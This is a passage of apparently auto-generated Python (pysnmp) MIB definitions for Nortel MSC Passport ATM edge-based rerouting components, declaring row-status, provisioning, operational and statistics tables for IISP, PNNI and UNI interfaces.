    mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')
# AtmIf/Iisp EBR component: same table layout as the Uni EBR subtree above
# (RowStatus, 1-octet bitmask provisioning, Gauge32 oper, Counter32 stats),
# indexed by the IISP component instead of UNI.
mscAtmIfIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7))
mscAtmIfIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 7, 7, 1))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 7, 7, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrRowStatus.setStatus('mandatory')
mscAtmIfIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrComponentName.setStatus('mandatory')
mscAtmIfIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 7, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrStorageType.setStatus('mandatory')
mscAtmIfIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfIispEbrIndex.setStatus('mandatory')
mscAtmIfIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    7, 7, 20))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrProvTable.setStatus('mandatory')
mscAtmIfIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 7, 7, 20, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrProvEntry.setStatus('mandatory')
# One-octet fixed-length bitmask columns, default hex 'c0', read-write.
mscAtmIfIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=
    ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
    ).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
    ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
    ).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrPathOptimization.setStatus('mandatory')
# Operational table: read-only Gauge32 connection counts.
mscAtmIfIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    7, 7, 30))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrOperTable.setStatus('mandatory')
mscAtmIfIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 7, 7, 30, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrOperEntry.setStatus('mandatory')
mscAtmIfIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
    ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=
    ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
    4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 3), Gauge32().subtype(
    subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
# Statistics table: Counter32 totals.
mscAtmIfIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    7, 7, 40))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrStatsTable.setStatus('mandatory')
mscAtmIfIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 7, 7, 40, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 7, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 7, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')
# AtmIf/Vpt/Iisp EBR component: the IISP EBR layout nested one level deeper
# under a virtual path terminator (extra mscAtmIfVptIndex in every index).
mscAtmIfVptIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9,
    6, 7))
mscAtmIfVptIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 6, 7, 1))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 9, 6, 7, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')
mscAtmIfVptIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 9, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrComponentName.setStatus('mandatory')
mscAtmIfVptIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 9, 6, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrStorageType.setStatus('mandatory')
mscAtmIfVptIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrIndex.setStatus('mandatory')
mscAtmIfVptIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 6, 7, 20))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrProvTable.setStatus('mandatory')
mscAtmIfVptIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 6, 7, 20, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')
# One-octet fixed-length bitmask columns, default hex 'c0', read-write.
mscAtmIfVptIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 1), OctetString().subtype(
    subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue
    ='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 9, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
    ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
    ).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')
# Operational table: read-only Gauge32 connection counts.
mscAtmIfVptIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 6, 7, 30))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrOperTable.setStatus('mandatory')
mscAtmIfVptIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 6, 7, 30, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')
mscAtmIfVptIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
    ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
    4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 2), Gauge32().subtype(
    subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6,
    1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 3), Gauge32().subtype(
    subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
# Statistics table: Counter32 totals.
mscAtmIfVptIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 6, 7, 40))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')
mscAtmIfVptIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 6, 7, 40, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 1), Counter32()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 2), Counter32()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')
# ---------------------------------------------------------------------------
# mscAtmIfVptPnniEbr subtree (OID 1.3.6.1.4.1.562.36.2.1.114.9.7.7):
# EBR objects for PNNI over a VPT. Mirrors the IISP subtree above:
# row-status table (1), provisioning (20), operational (30), statistics (40).
# ---------------------------------------------------------------------------
mscAtmIfVptPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9,
    7, 7))

# Row-status table (1): row creation/deletion plus housekeeping columns.
mscAtmIfVptPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 7, 7, 1))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 9, 7, 7, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 9, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')
mscAtmIfVptPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 9, 7, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')
# Index column: NonReplicated is a project-declared textual convention
# (single-instance component index).
mscAtmIfVptPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrIndex.setStatus('mandatory')

# Provisioning table (20): two 1-octet fixed-length bitmaps, default 0xc0.
mscAtmIfVptPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 7, 7, 20))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')
mscAtmIfVptPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 7, 7, 20, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 1), OctetString().subtype(
    subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue
    ='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 9, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
    ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
    ).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')

# Operational table (30): read-only connection gauges.
mscAtmIfVptPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 7, 7, 30))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')
mscAtmIfVptPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 7, 7, 30, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
    ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
    4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 2), Gauge32().subtype(
    subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6,
    1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 3), Gauge32().subtype(
    subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')

# Statistics table (40): Counter32 running totals.
mscAtmIfVptPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 7, 7, 40))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 7, 7, 40, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 1), Counter32()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 2), Counter32()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')
# ---------------------------------------------------------------------------
# mscAtmIfVptUniEbr subtree (OID 1.3.6.1.4.1.562.36.2.1.114.9.8.7):
# EBR objects for UNI over a VPT. Same table layout as the IISP/PNNI
# subtrees: row-status (1), provisioning (20), operational (30), stats (40).
# ---------------------------------------------------------------------------
mscAtmIfVptUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9,
    8, 7))

# Row-status table (1).
mscAtmIfVptUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 8, 7, 1))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 8, 7, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 8, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 9, 8, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrComponentName.setStatus('mandatory')
mscAtmIfVptUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 8, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrStorageType.setStatus('mandatory')
mscAtmIfVptUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 8, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrIndex.setStatus('mandatory')

# Provisioning table (20): 1-octet fixed-length bitmaps, default 0xc0.
mscAtmIfVptUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    9, 8, 7, 20))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrProvTable.setStatus('mandatory')
mscAtmIfVptUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 8, 7, 20, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 9, 8, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=
    ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
    ).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 9, 8, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
    ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
    ).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')

# Operational table (30): read-only connection gauges.
mscAtmIfVptUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    9, 8, 7, 30))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrOperTable.setStatus('mandatory')
mscAtmIfVptUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 8, 7, 30, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
    ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
    4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 2), Gauge32().subtype(
    subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6,
    1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 3), Gauge32().subtype(
    subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')

# Statistics table (40): Counter32 running totals.
mscAtmIfVptUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 8, 7, 40))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 8, 7, 40, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
